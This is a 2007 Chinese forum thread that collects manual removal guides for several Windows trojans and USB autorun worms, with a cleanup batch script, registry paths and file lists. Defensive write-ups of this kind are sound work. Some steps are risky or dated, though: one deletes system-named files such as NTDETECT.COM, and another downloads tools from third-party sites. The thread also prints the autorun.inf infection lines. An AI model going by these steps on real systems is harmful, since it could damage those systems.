打印

●★★● 木马病毒区整理●★★●

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

16^# 大中小发表于 2007-3-7 03:01 只看该作者

pagefile.pif病毒解决方案

pagefile.pif文件产生D盘无法正常打开的详细解决方案
最近在浏览一网站的webshell时，不慎中毒。
死机后重启，发现D盘无法正常访问，双击后没有反映，其他盘正常。右键--打开后，发现多出一个文件，前提：打开了显示所有文件（工具--文件夹选项--查看--显示所有文件和文件夹选中，然后确定），文件名为“pagefile.pif”，马上查毒，没有病毒..我用的是正版金山毒霸2006。正奇怪时发现金山网镳的任务栏图标小时了，但毒霸主程序没有结束掉。马上打开任务管理器，没有发现可疑进程，删除“pagefile.pif”文件，OK一下就删除了。再打开D盘，显示“找不到pagefile.pif，指定位置：”，马上右键打开D盘，没有找到AutoRun.inf（小常识：我们都知道平时一些游戏光盘可以自动启动，那是因为在光盘下有个"AutoRun"的文件，它是自动运行的一个基础文件。可是D盘里没有这个文件啊。马上搜索pagefile.pif，结果，搜索为系统见，才恍然大悟，马上“工具--文件夹选项--查看--去掉“隐藏受保护的操作系统文件”然后确定”，OK，多出一个Auturun文件，我们知道有系统属性的文件是无法直接删除的，我们要剔除它的系统属性，打开CMD(开始--运行--CMD.exe)，输入：attrib D:\autorun.inf -s -h -r回车，然后直接删除文件。

OK基本工作已经完成，然后我想换个杀毒软件试试能不能扫到病毒，刚打开IE就发现D盘那两个文件又出来了！OK绑定了exe文件，恢复exe文件关联，在CMD下输入assoc.exe=exefile，回车。这时，恢复了文件关联。下载木马克星，晕！被杀，用瑞星在线杀毒（www.3721.com 不是 www.rising.com.cn)，全面扫描C,D两盘，杀掉病毒，然后删除两个D盘的文件，最后恢复下exe文件关联，在注册表里然后删除相关注册表键值：进入注册表以后，展开HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{......}\shell，删除shell下的autorun键值，刷新以后，此时就应该可以打开盘符了。
可能有多个!!

OK全部检查下，保证D盘里没有文件存在，exe文件关联正确，注册表里没有启动项。

重启OK！

一个病毒就这么解决了。如果它还启动，请使用工具清除掉Trojan Program 的开机启动。就OK了！

后来经搜索整理，搜索到网上流传着下面的清除方法，本人未经测试，请各位自行斟辨。

一、 Trojan.PSW.Lmir.iux
这个坏家伙，不知道谁在我电脑上上了，把这个坏家伙给引来了，起初我还不知道，我一看怎么电脑越来越慢了呀。看了下进程，怎么C:\WINDOWS\services.exe有这个鸟东西呀。就知道中马了，然后就删呀删，没想到这家伙关联了这么多文件，而且还关联了IE。
昨天还浪费了我点时间，诺顿查不了这个家伙晕死了，然后拉出可怕的瑞星在线杀毒，查出一共有N个文件，昨天就是不知道一共有几个文件，所以怎么清也清不干净呢。

没想到这家伙还有蛮多个的呀。写了个BAT把它给K了。

@echo ===============================================
@echo Delete Trojan.PSW.Lmir.iux By o__4pollo
@echo ===============================================
@echo Start...
@echo ===============================================
@echo Execute ATTRIB...

@echo off
attrib -s -r -a -h c:\windows\1.com
attrib -s -r -a -h c:\windows\services.exe
attrib -s -r -a -h c:\windows\explorer.com
attrib -s -r -a -h c:\windows\finder.com
attrib -s -r -a -h c:\windows\exeroute.exe

attrib -s -r -a -h c:\windows\debug\debugprogram.exe

attrib -s -r -a -h c:\windows\system32\regedit.com
attrib -s -r -a -h c:\windows\system32\dxdiag.com
attrib -s -r -a -h c:\windows\system32\msconfig.com
attrib -s -r -a -h c:\windows\system32\command.pif
attrib -s -r -a -h c:\windows\system32\finder.com
attrib -s -r -a -h c:\windows\system32\rundll32.com
attrib -s -r -a -h c:\windows\system32\i.com

attrib -s -r -a -h c:\progra~1\common~1\iexplore.pif
attrib -s -r -a -h c:\progra~1\intern~1\iexplore.com

attrib -s -r -a -h d:\pagefile.pif
rem ===============================================
@echo Execute DELETE...

@echo off
del c:\windows\1.com
del c:\windows\services.exe
del c:\windows\explorer.com
del c:\windows\finder.com
del c:\windows\exeroute.exe

del c:\windows\debug\debugprogram.exe

del c:\windows\system32\regedit.com
del c:\windows\system32\dxdiag.com
del c:\windows\system32\msconfig.com
del c:\windows\system32\command.pif
del c:\windows\system32\finder.com
del c:\windows\system32\rundll32.com
del c:\windows\system32\i.com

del c:\progra~1\common~1\iexplore.pif
del c:\progra~1\intern~1\iexplore.com

del d:\pagefile.pif

@echo ===============================================
@echo End...
@echo ===============================================

重启之后。Exe关联出错，命令行安全模式下执行assoc .exe=exefile 再重启，搞定。

好了，不用再想着这个家伙了。呵呵。

注：这个病毒命是瑞星报的哦。别的杀软不一定一样的哦。我发现在的几点写下：
一、启动项中多出一个Shell 参数为 Explorer.exe 1 多了一个1，正常的没有1。
二、Run、Runonce键值中多出了一个Trojan Program，程序文件位于c:\windows\services.exe。
三、在D盘中写入一个Autorun.inf文件，Open的参数为pagefile.pif。这家伙很坏，一打开D盘也是启动这个坏家伙，还有在taskmgr.exe中结束不了services.exe这个进程，我是用冰刃结掉，然后删除掉的。

别的暂时也没想出什么，不知道这个家伙是盗什么的，好像是传奇世界的马吧，不太清楚。

二、这几天机子很慢,我用的是2000系统,在进行里发现老是瑞星在占用CPU,可是我根本没有杀毒,而且现在开机后瑞星不能自行启动了,而且也不能手动启动,也不能升级,好象是被控制了,我在D盘里找到一个文件,pagefile.pif的快捷方式很不寻常,是MSDOS的图标,还有那个autorun.inf就是指向这个文件的,可是我把它删除重启后还是有,在安全模式下删除也不行,开机后还是有,我在硬盘里找不到pagefile.pif源文件,真是怪了

大家看看我这个是什么问题?

解决办法引之本区。
1、修改注册表启动项，加入(在MSCONFIG中可查到)
c:\windows\services.exe
此病毒文件被运行后，将修改.exe关联文件（assoc.exe看到为winfiles，正常应该为exefile），并同时生成几个固定的病毒文件，作为关联调用
2、生成如下
D:盘生成
autorun.inf
[autorun]
OPEN=D:\pagefile.pif（作用：打开D盘时运行病毒）
c:\windows目录c:\windows\services.exe作为系统进程运行无法手工终止
C:\WINDOWS\ExERoute.exeEXE关联使用之一
C:\WINDOWS\1.com启动时执行，
C:\WINDOWS\finder.com
C:\WINDOWS\explorer.com
另外还有几个COM的文件，其大小都一样size:33,833
C:\WINDOWS\system32\command.pif
C:\WINDOWS\system32\rundll32.com
C:\WINDOWS\system32\finder.com
C:\WINDOWS\system32\MSCONFIG.COM
C:\WINDOWS\system32\dxdiag.com
C:\WINDOWS\system32\regedit.com
C:\WINDOWS\Debug\DebugProgram.exe程序出错调试调用其它目录C:\ProgramFiles\InternetExplorer\iexplore.com被关联于开始菜单的IE执行及HTM的执行C:\ProgramFiles\CommonFiles\Explorer.PIF外壳调用传染当你打开分区时，桌面有刷新状态，说明此文件被调用手工清除：
1、在DOS状态下，删除所有相关的文件，因为文件属性都为RHS，所以要先改掉属性：

attrib-r-h-s*.com
再逐个删除每个目录都这么做
2、恢复EXE文件关联
assoc.exe=exefile
3、注意一定要删除干净，只要存在一个都有可能使它执行，而重新感染如果进不了DOS的，可使用软件辅助删除

1、运行cmd.exe
cd\windows\system32\
copycmd.execmd.com
如果进入不了cmd.exe,可以直接到文件夹里将其改名为cmd.com

2、先使用木马杀客查杀，下载地址：木马杀客.rarhttp://down.fzii.com/安全工具/木马杀客.rar
木马杀客全盘查杀完，请不要执行任何文件

3、开始->运行->输入cmd.com(或者点流览，选择到c:\windows\system32目录，找到cmd.com,如果还未改为com，一定要先改才运行，因为此时病毒已将关联更改，如果看不到后缀，请到文件夹选项里开启，不隐藏已知关联的选项)

4、此时已进入DOS下，输入assoc.exe=exefile这样就解除了EXE的文件

5、打开msconfig.exe将services的启动去除，即可。如果还是传染病毒，说明某些文件未清除，笔者是在DOS下手工清除的，通过查看文件大小为33833的文件将其删除。
另个补充一下我的解决办法，用KV2005就可以删除上面病毒，然后手动清掉启动的中选项。，解决病毒后，会有后遗症，第一桌面的IE不能使用了，重新指定IEploer的位置就可以了，第二，D：盘打不开，右盘选择打开，里有autorun.ini可能是隐藏的，（我的电脑，－－工具－－文件夹－－显示所有文件，不隐藏系统文件。）看到这就删除掉，可以解决了。

三、

解决办法引之本区。
1、修改注册表启动项，加入(在MSCONFIG中可查到)
c:\windows\services.exe
此病毒文件被运行后，将修改.exe关联文件（assoc .exe 看到为 winfiles，正常应该为 exefile），并同时生成几个固定的病毒文件，作为关联调用
2、生成如下
D:盘生成
autorun.inf
[autorun]
OPEN=D:\pagefile.pif （作用：打开D盘时运行病毒）
c:\windows目录 c:\windows\services.exe 作为系统进程运行无法手工终止
C:\WINDOWS\ExERoute.exe EXE关联使用之一
C:\WINDOWS\1.com 启动时执行，
C:\WINDOWS\finder.com
C:\WINDOWS\explorer.com
另外还有几个COM的文件，其大小都一样size: 33,833
C:\WINDOWS\system32\command.pif
C:\WINDOWS\system32\rundll32.com
C:\WINDOWS\system32\finder.com
C:\WINDOWS\system32\MSCONFIG.COM
C:\WINDOWS\system32\dxdiag.com
C:\WINDOWS\system32\regedit.com
C:\WINDOWS\Debug\DebugProgram.exe 程序出错调试调用其它目录 C:\Program Files\Internet Explorer\iexplore.com 被关联于开始菜单的IE执行及HTM的执行 C:\Program Files\Common Files\Explorer.PIF 外壳调用传染当你打开分区时，桌面有刷新状态，说明此文件被调用手工清除：
1、在DOS状态下，删除所有相关的文件，因为文件属性都为RHS，所以要先改掉属性：
attrib -r -h -s *.com
再逐个删除每个目录都这么做
2、恢复EXE文件关联
assoc .exe=exefile
3、注意一定要删除干净，只要存在一个都有可能使它执行，而重新感染如果进不了DOS的，可使用软件辅助删除

1、运行cmd.exe
cd\windows\system32\
copy cmd.exe cmd.com
如果进入不了cmd.exe,可以直接到文件夹里将其改名为cmd.com

2、先使用木马杀客查杀，下载地址：木马杀客.rar http://down.fzii.com/安全工具/木马杀客.rar
木马杀客全盘查杀完，请不要执行任何文件

3、开始->运行->输入cmd.com (或者点流览，选择到 c:\windows\system32目录，找到cmd.com,如果还未改为com，一定要先改才运行，因为此时病毒已将关联更改，如果看不到后缀，请到文件夹选项里开启，不隐藏已知关联的选项)

4、此时已进入DOS下，输入 assoc .exe=exefile 这样就解除了EXE的文件

5、打开msconfig.exe 将 services的启动去除，即可。如果还是传染病毒，说明某些文件未清除，笔者是在DOS下手工清除的，通过查看文件大小为33833的文件将其删除。
另个补充一下我的解决办法，用KV2005就可以删除上面病毒，然后手动清掉启动的中选项。，解决病毒后，会有后遗症，第一桌面的IE不能使用了，重新指定IEploer的位置就可以了，第二，D：盘打不开，右盘选择打开，里有autorun.ini可能是隐藏的，（我的电脑，－－工具－－文件夹－－显示所有文件，不隐藏系统文件。）看到这就删除掉，可以解决了

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

17^# 大中小发表于 2007-3-7 03:01 只看该作者

rose病毒的杀毒方法:
版本一:
Rose.exe病毒主要表现在：
1、在系统中占用大量cpu资源。
2、在每个分区下建立rose.exe autorun.inf 2个文件，双击该盘符时显示自动运行，但无法打开该分区。
3、大部分通过U盘、移动硬盘等存储设备传播。对网络危害还在发现过程当中。
4、可能会引起部分操作系统崩溃，表现在开机自检后直接并反复重启，无法进入系统。
由于某些原因，各种杀毒软件均没有提供相应的病毒库，导致无法通过杀毒软件查杀该病毒。现网络中心提供手动杀毒方式，具体如下：
1、调出任务管理器，在进程页面中结束掉所有名称为Rose.exe的进程（建议在后面的操作中反复此操作，以确保病毒文件不会反复发作）。
2、在开始－－运行中输入“regedit”（XP系统）打开注册表，查找所有的“rose.exe”键值项，找到后将整个shell子键删除。
3、在我的电脑－工具－文件夹选项－查看－显示所有文件和文件夹，把“隐藏受保护的系统文件”的勾去掉。
4、对每个盘符点右键－打开进入（切记不能双击），删掉所有的rose.exe和autorun.inf文件。
5、在c:windowssystem32下查找有没有rose.exe文件，如果存在就直接删掉。

方法二:
1、开机的时候按F8选择安全模式
2、在开始－－运行中输入“regedit”（XP系统）打开注册表，查找所有的“rose.exe”键值项，找到后将整个shell子键删除。
3、在我的电脑－工具－文件夹选项－查看－显示所有文件和文件夹，把“隐藏受保护的系统文件”的勾去掉。

找到 C:\Documents and Settings\Local Settings\下面的TEMP和Temporary Internet Files文件夹内容，把能删除都删掉。另外system Volume Information目录（文件夹）下(WinXP)，请关闭系统还原。

System Volume Information目录（文件夹）(WinXP)都是系统还原用到的目录，要是病毒藏身在那里，需要关闭系统还原。

关闭Windows XP 系统还原
单击“开始”。右击“我的电脑”，然后单击“属性”。
单击“系统还原”选项卡。
选中“关闭系统还原”或“关闭所有驱动器上的系统还原”。
单击“应用”，然后单击“确定”。

4、对每个盘符点右键－打开进入（切记不能双击），删掉所有的rose.exe和autorun.inf文件。
5、在c:\windows\system32下查找有没有rose.exe文件，如果存在就直接删掉
转自版主虫子的帖子
方法三:
若有以下文件删除之
X:\autorun.inf
X:\rose.exe
c:\system32\rose.exe
C:\NTDETECT.COM
C:\NTDETECT.COM
c:\NTDETECT.COM
c:\system.sys
c:\windows\system32\run.reg
c:\windows\system32\systemdate.ini
d:\systemdate.ini
d:\systemfile.com

注册表项
rose.exe
Shellexecute=rose.exe

想请问大家是否被改注册表后就被强制关机？因为有此代码。。。。。。

心得:
rose病毒除了上面说的
1、在系统中占用大量cpu资源。
2、在每个分区下建立rose.exe autorun.inf 2个文件，双击该盘符时显示自动运行，但无法打开该分区。
3、大部分通过U盘、移动硬盘等存储设备传播。对网络危害还在发现过程当中。
4、可能会引起部分操作系统崩溃，表现在开机自检后直接并反复重启，无法进入系统。
之外,还可以自行复制执行文件并修改文件名,并在可能的每个注册信息里保存自己的注册信息,而且有可能引起浏览器错误
解决方法:
手工操作
1、调出任务管理器，在进程页面中结束掉所有名称为Rose.exe的进程（建议在后面的操作中反复此操作，(以确保病毒文件不会反复发作）。
2、在开始－－运行中输入“regedit”（XP系统）打开注册表，查找所有的“rose.exe”键值项，找到后将整个shell子键删除。
3、在我的电脑－工具－文件夹选项－查看－显示所有文件和文件夹，把“隐藏受保护的系统文件”的勾去掉。
4、对每个盘符点右键－打开进入（切记不能双击），删掉所有的rose.exe和autorun.inf文件。
5、在c:windowssystem32下查找有没有rose.exe文件，如果存在就直接删掉。
然后参考版主 zcp08765的帖子删除
X:\autorun.inf
X:\rose.exe
c:\system32\rose.exe
C:\NTDETECT.COM
C:\NTDETECT.COM
c:\NTDETECT.COM
c:\system.sys
c:\windows\system32\run.reg
c:\windows\system32\systemdate.ini
d:\systemdate.ini
d:\systemfile.com
这样手工删除之后,使用江民扫描所有盘符会发现
C:\System Volume Information\_restore{716B96B6-B35C-4784-B6F8-A8F1C6954777}\RP57或RP56
D:\System Volume Information\_restore{716B96B6-B35C-4784-B6F8-A8F1C6954777}\RP57或RP56
E:\System Volume Information\_restore{716B96B6-B35C-4784-B6F8-A8F1C6954777}\RP57或RP56
中删掉所有的rose.exe和autorun.inf文件和修改过文件名的rose.exe和autorun.inf文件
修改后的文件名可能为A0053***.exe A0053***.inf 病毒文件可能不止一个

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

18^# 大中小发表于 2007-3-7 03:04 只看该作者

最近，很多朋友发现，使用U盘时遇到双击打不开的情。

　　很多朋友就以为自己的U盘坏了，其实我们只要稍加细心就会发现问题所在，下面我们就来一起看看，问题究竟在什么地方。

　　我们这次不双击U盘，而是在u盘上点击右键，仔细看看弹出的右键菜单：
右键菜单中出现两项比较奇怪的菜单（我这里是英文版系统，如果你是中文版系统，会看的更清楚），“Open”，“Browser”，有朋友就会想：这是怎么添加上的呢？答案只有一个：你的U盘上肯定被偷偷的添加了一些文件进去！

　　我们尝试使用菜单中间的“Open”，成功的打开了U盘！

　　OK！进入下一步，我们检查U盘中的内容，发现并没有明显的多什么内容，即便通过"控制面板",“文件夹选项”显示隐藏文件检查，也没有发现内容。

　　其实，在Windows里还有一类文件：系统保护文件，这类文件你使用“显示隐藏文件”选项是不能显示的，必须使用另外一条命令中的选项才行：我们把这个“隐藏操作系统保护文件”选项前面的勾去掉，然后点击确定，再到U盘中去看看，也许会有什么发现：）可恶的病毒终于露出马脚了！我们看后两个：一个名为RECYCLER的文件夹，一个autorun.inf文件(这个autorun.inf文件的作用大了，我们后面就给各位介绍其中的一种) 。首先打开autorun.inf文件看看：U盘上的右键菜单就是被这个文件加上去的！找到了原因，我们就删除这两个文件！

　　接下来退出U盘，重新插上U盘，再看右键菜单，这次正常了好了，问题到这里就解决了!

　　下面，我们附带着给大家介绍一下autorun.inf文件的一个小功能：给U盘添加一个漂亮的盘符。

　　在平时使用U盘的过程中，我们总是看见相同的盘符，下面我们就来DIY一下：）

　　首先，我们建立一个autorun.inf，在其中输入以下内容：

　　[autorun]
　　ICON=2.ICO

　　接着选择好我们需要的ICO图标文件（这里命名为2.ICO），将这两个文件一同复制到U盘里，然后将U盘弹出，并重新插上

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

19^# 大中小发表于 2007-3-7 03:04 只看该作者

灰鸽子变种很多，查杀方法各异。本文只适用于下述情形:

　　(1)杀毒软件报告灰鸽子但杀不净；

　　(2)HijackThis日志中发现异常O23项(如:O23 - Service: svchost (Windows Access) - Unknown owner - C:\WINDOWS\windr.exe)；且(3)灰鸽子的文件在%windows% 目录下。

　　这类灰鸽子的手工查杀流程:

　　1、打开注册表编辑器，展开:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services。删除灰鸽子的服务项。

　　怎么确认灰鸽子服务项的名字？看HijackThis日志O23的提示。如:O23 - Service: svchost (Windows Access)，括弧中的Windows Access就是你要删除的灰鸽子服务项。

　　如果HijackThis日志O23的提示中没有括弧中的内容，紧接在Service:后面的内容就是灰鸽子的服务名——删！

　　有人可能会问:这是不是笨了点儿？在HijackThis面板中直接点击这个O23，再点击“修复”不就完了吗？

　　是的。我也知道有此一法。但这种方法并不能保证你总能修复掉这个异常的O23。最后，还是要用注册表编辑器删除它。

　　2、重启系统。为什么要重启？因为这类鸽子没有注册表监控。删除其服务项后，重启系统，鸽子就不能运行了。这时，鸽子的文件可以随便删。

　　3、显示隐藏文件，删除鸽子的文件。

　　这类鸽子的文件都在%windows% 目录下。%windows%是什么意思？%windows%是个变量符号，表示“WINDOWS”目录。因为每个人的系统不一定都安装在相同的分区，因此，只能这么表示。如果你的系统安装在C盘，%windows%指的是C:\WINDOWS；如果你的系统安装在D盘，%windows%指D:\WINDOWS，依此类推。

　　怎么确认鸽子的文件名？还是看HijackThis日志。Unknown owner - 后面的内容就是鸽子文件的所在位置及其文件名。本例是C:\WINDOWS\windr.exe)。

　　注意:除了可执行文件.exe外(本例是windr.exe)，%WINDOWS%下可能还有包含可执行文件名的.dll文件(以本例为例，这些dll的文件名可能有windr.dll、windr_hook.dll、windrKey.dll)，这些文件数目不定。只要有，也要删除。

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

20^# 大中小发表于 2007-3-7 03:04 只看该作者

病毒名称:诡秘下载器变种CXW(Trojan.DL.Delf.cxw)
　　病毒类型:流氓软件
　　病毒危害级别:★★★☆
　　病毒发作现象及危害:
　　该病毒运行后会从黑客指定的网站下载指令并运行，会将用户IE浏览器的主页锁定为一个名叫“7939上网导航”的网站，以提高该网站的访问量，该病毒会试图禁止多种安全工具软件运行，并会造成一些主流杀毒软件运行不正常，它还会自动从http//down.Viru??ky.com下载新的病毒并运行。

　　手工清除：

　　一、清除内存中的病毒

　　在任务管理器中找到名为“Realplayer.exe”和“Explorer.exe”的进程，单击鼠标右键，选择“结束进程”。

　　“Explorer.exe”进程被结束后将会看不到桌面图标和任务栏，这时按住Ctrl+Alt+Del键，启动任务管理器，点击菜单“文件”－》“新建任务（运行…）”，输入“explorer.exe”，点击“确定”。

　　二、删除病毒文件

　　1、打开“我的电脑”，选择菜单“工具”-》“文件夹选项”，点击“查看”，取消“隐藏已知类型文件的扩展名”前的对勾，然后点击“确定”。

　　2、进入Windows系统文件目录下（默认为C:WindowsSystem32），删除掉“realplayer.exe”、“brlmon.dll”（部分变种dll文件的名称为ravmon.dll）两个文件。

　　三、修复注册表

　　1、点击“开始”菜单，选择“运行”，输入“regedit.exe”并确定，打开注册表编辑器。

　　2、打开HKEY_CURRENT_USER /Software /Microsoft /Windows /CurrentVersionRun，在右边的窗格中找到“Realplayer.exe”一项，将其删除。

　　3、打开HKEY_LOCAL_MACHINE /SOFTWARE /Microsoft /Windows /CurrentVersionRun，在右边的窗格中找到“Realplayer.exe”一项，将其删除。

　　4、打开HKEY_LOCAL_MACHINE /SOFTWARE，将其下的“Microsoft NT”目录整个删除（包含其下的子项）。

　　5、打开HKEY_LOCAL_MACHINE /SOFTWARE /Microsoft，将其下的“RunDown”目录整个删除（包含其下的子项）。

　　四、修复IE首页

　　打开IE浏览器，点击菜单“工具”－》“Internet选项”，打开“常规”选项页，在“主页”处自行设置IE的主页地址。

　　用杀毒软件清除：

　　由于该病毒变种繁多，DLL文件名称不固定，手工清除有一定困难，建议用户使用瑞星杀毒软件进行清除。清除该病毒时需注意以下三点：

　　1、必须在杀毒软件的查杀目标中勾选“内存”

　　由于该病毒会注入到系统进程当中，因此查杀该病毒必须先对内存进行检查，否则可能出现查杀失败。

　　2、杀毒后需重新启动计算机

　　瑞星在查到该病毒时会提示用户“重新启动计算机后删除文件”。用户只需在杀毒完毕后立即重新启动计算机即可清除该病毒。

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

21^# 大中小发表于 2007-3-7 03:05 只看该作者

我的电脑安全环境
SP1.
配置Intel(R) Pentiun(R) 4 CPU 2.40GHz 512M的内存
开了天网,咖啡8.0I 还有ewido

QUOTE:
:
　　中招经过,只因去一个常看电影的网站,中午无聊想看龙虎门,直点收藏夹,那站没想到被人看上了,进去后,当时电脑就卡着了,死机了,好不容易强制关掉GB ,进程一看,多了N个进程.禁止,点运行msconfig,完全没有任何反应,网络都上不了,只能脱机打开百度.
　　一打开任务管理器,哇,蒙了.都成双的来了,最最最厉害的就是这个家伙居然产生两个进程,都是很常见的,LSASS.跟CTFMON,根本就禁止不掉的,一点禁止就会跳出该进程为系统进程.
　　无奈进入安全模式,全部显示文件+隐藏文件,先用cureit.exe,没想到,厉害,这个文件只能打开前面那个start界面,后面就说不能进行啥滴,反正是英文,不懂,然后用HJ扫,(可惜所有的都不在了,今天偶重装系统了,不是因为病毒,是因为网卡的原因)修复,修了再修还是无效,用EW扫,都无效,只能治标不治本.
　　正常的系统进程都在system下面的,这几个产生的都是直接在windows下面的,去删除,但是只要一运行msconfig就会自动产生lsass.exe这个进程了,郁闷,不过我是先进了临时文件夹删除了一些东西,都是那些LJ坏蛋安装包.
　　所有的软件搞不定，只能动手在同事的电脑上搜索了一篇,最全的解决方案,命真好,一搜就到了：）
＝＝＝＝＝＝＝＝＝＝最全面的LSASS.EXE解决方法＝＝＝＝＝＝＝＝＝＝

:
正文开始：
以windows xp为例
一、准备工作：
打开“我的电脑”——工具——文件夹选项——查看
a、把“隐藏受保护的操作系统文件（推荐）”和“隐藏已知文件类型的扩展名”前面的勾去掉；
b、勾中“显示所有文件和文件夹”
二、结束进程
用Ctrl+Alt+Del调出windows务管理器,想通过右击当前用户名的lsass.exe来结束进程是行不通的.会弹出该进程为系统进程无法结束的提醒框;
点到任务管理器进程面版，点击菜单，"查看"－"选择列"，在弹出的对话框中选择"PID（进程标识符）"，并点击"确定"。找到映象名称为"LSASS.exe"，并且用户名不是"SYSTEM"的一项，记住其PID号.点击"开始"——运行，输入"CMD"，点击"确定"打开命令行控制台。
输入"ntsd –c q -p (此红色部分填写你在任务管理器里看到的LSASS.EXE的PID列的数字，是当前用户名进程的PID，别看错了)"，比如我的计算机上就输入"ntsd –c q -p 1064".这样进程就结束了。（如果结束了又会出现，那么你还是用下面的方法吧）
进程里面有2个lsass.exe进程,一个是system的,一个是当前用户名的(该进程为病毒).
用EWIDO可以直接禁止结束掉的，但是这个上面那个在DOS下面的也很不错的哦！
三、删除病毒文件
删除如下几个文件：（与WIN2000的目录有所不同）
C:/Program Files/Common Files/INTEXPLORE.pif （有的没有.pif）
C:/Program Files/Internet Explorer/INTEXPLORE.com
C:/WINDOWS/EXERT.exe
C:/WINDOWS/IO.SYS.BAK
C:/WINDOWS/LSASS.exe
C:/WINDOWS/Debug/DebugProgram.exe
C:/WINDOWS/system32/dxdiag.com
C:/WINDOWS/system32/MSCONFIG.COM
C:/WINDOWS/system32/regedit.com
在D:盘上点击鼠标右键，选择“打开”。删除掉该分区根目录下的"Autorun.inf"和"command.com"文件.
四、删除注册表中的其他LJ信息
将C:/WINDOWS目录下的"regedit.exe"改名为"regedit.com"并运行，删除以下项目：
1、HKEY_CLASSES_ROOT/WindowFiles
2、HKEY_CURRENT_USER/Software/VB and VBA Program Settings
3、HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main 下面的 Check_Associations项
4、HKEY_LOCAL_MACHINE/SOFTWARE/Clients/StartMenuInternet/INTEXPLORE.pif
5、HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run 下面的ToP项
五、修复注册表中被篡改的键值（红色部分为需要信息）
1、将HKEY_CLASSES_ROOT/.exe的默认值修改为 "exefile"(原来是windowsfile)
2、将HKEY_CLASSES_ROOT/Applications/iexplore.exe/shell/open/command 的默认值修改为 "C:/Program Files/Internet Explorer/iexplore.exe" %1 (原来是intexplore.com)
3、将HKEY_CLASSES_ROOT/CLSID/{871C5380-42A0-1069-A2EA-08002B30309D} /shell/OpenHomePage/Command 的默认值修改为
"C:/Program Files/Internet Explorer/IEXPLORE.EXE"(原来是INTEXPLORE.com)
4、将HKEY_CLASSES_ROOT /ftp/shell/open/command 和HKEY_CLASSES_ROOT/htmlfile/shell/opennew/command
的默认值修改为"C:/Program Files/Internet Explorer/iexplore.exe" %1 (原来的值分别是INTEXPLORE.com和INTEXPLORE.pif)
5、将HKEY_CLASSES_ROOT /htmlfile/shell/open/command 和
HKEY_CLASSES_ROOT/HTTP/shell/open/command的默认值修改为
"C:/Program Files/Internet Explorer/iexplore.exe" –nohome
6、将HKEY_LOCAL_MACHINE/SOFTWARE/Clients/StartMenuInternet 的默认值修改为"IEXPLORE.EXE".(原来是INTEXPLORE.pif)
六、收尾工作
关掉注册表编辑器
将C:/WINDOWS目录下的regedit.com改回regedit.exe
　

QUOTE:
:
又一个意外的小插曲，EXE文件关联出错
在改1、将HKEY_CLASSES_ROOT/.exe的默认值修改为 "exefile"(原来是windowsfile)
这一条的里面，我很不小心的把exefile改错了，导致我重启后，所有EXE文件都不能用了，网络不能用，没有优盘，真可怜，我以前的XP优化导入那东西又被我删了，
又在网上找了个方法，真好用，还真的不错，分享一下！！
1.重启，进入带命令提示符的安全模式
2.反正会有框框出来的，DOS界面么
3.输入命令　assoc.exe=exefile
打回画后就会看到.exe=exefile
4.EXIT退出，然后CTRL+ALT+DEL唤出管理器，选择重启，当当当，OK啦

:
最后最后的话，俺昨天一天重启鸟了有七十多次，郁闷伐！
　　病毒俺是杀掉了，速度也快了N倍，但是我的网络就死也上不了，DHCP指派不到IP呀，痛苦，我就就就想到系统还原，没辙，那破玩意开着的，居然说还原不到指定日期，整吧，我重装好了都关了，丫丫的反正无用武之地的东东。
　　那破网卡，少个mic客户端，死也装不上啊。我费尽了心思，我求它，我删除它，我停用，我我我卸载，都不行，就差烧香了，为了一个网卡，偶重装了
干净。不过我的收藏夹忘了导出了，郁闷的一件事。　

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

22^# 大中小发表于 2007-3-7 03:05 只看该作者

就是让你找不着

QQ作为目前最为流星的一款及时通讯工具之一，在一些软件高手的帮助下功能和改进正在不断完善，其中显示好友IP和通讯端口的功能是目前使用最为频繁的。但是让个人的IP地址任意暴露在别人目前多少有些不爽，特别是如果你的IP被他人得知，很可能泄露自己的真实地里位置，并且还有可能受到攻击。

今天就又网友向笔者反映如何在上线时隐藏自己的IP，下面就给大家介绍一个隐藏QQ IP的方法，一个小软件就可以搞定。

名称：兰飞 QQiPPro

版本：3.5
这个小软件的名称叫“兰飞 QQiPPro”，大小只有600K，这是一款用于隐藏QQ IP地址的软件，避免我们的IP暴露在黑客面前或者受到别人的恶意攻击，并且还有许多特殊的功能，一起来看看吧

TOP

绝版青春

青春散场

信息部队-上尉

Rank: 8

岁月联盟－创始大神

宣传大使勋章至尊贵宾勋章

23^# 大中小发表于 2007-3-7 03:08 只看该作者

内容分类：木马病毒
关键词： Trojan.DL.Agent.apb

　　症状：瑞星文件监控或主程序检测到Trojan.DL.Agent.apb，病毒文件路径C:\Document and Settings\All Users\Application Data\Microsoft\IEHelper\IEHelper*.dll（其中的*代表文件名变化的部分），状态为“重新启动计算机后删除”，但重启计算机后，病毒仍然存在。

　　
提示：本篇知识库仅适用于病毒文件保存在NTFS分区的情况；
如果病毒文件在FAT分区的话，请启动计算机，按F8键到安全模式下手动删除。

解决方案：

如果您的操作系统是Windows 2000：

步骤1、把病毒文件IEHelper*.dll剪切到其他目录，下面以剪切到桌面为例步骤2、右键点击病毒文件IEHelper*.dll，在菜单中选择“属性”
步骤3、在“安全”标签页中，取消勾选“允许来自父系的可继承权限传播给该对象”，点击“确定”。然后逐一选择名称列表中的用户，点击“删除”按钮，直至删除所有用户。步骤4、点击“安全”标签页中“添加”按钮，在“选择用户或组”中，选择添加“Everyone”，点击“确定”；

内容分类：木马病毒
关键词： Trojan.DL.Agent.apb

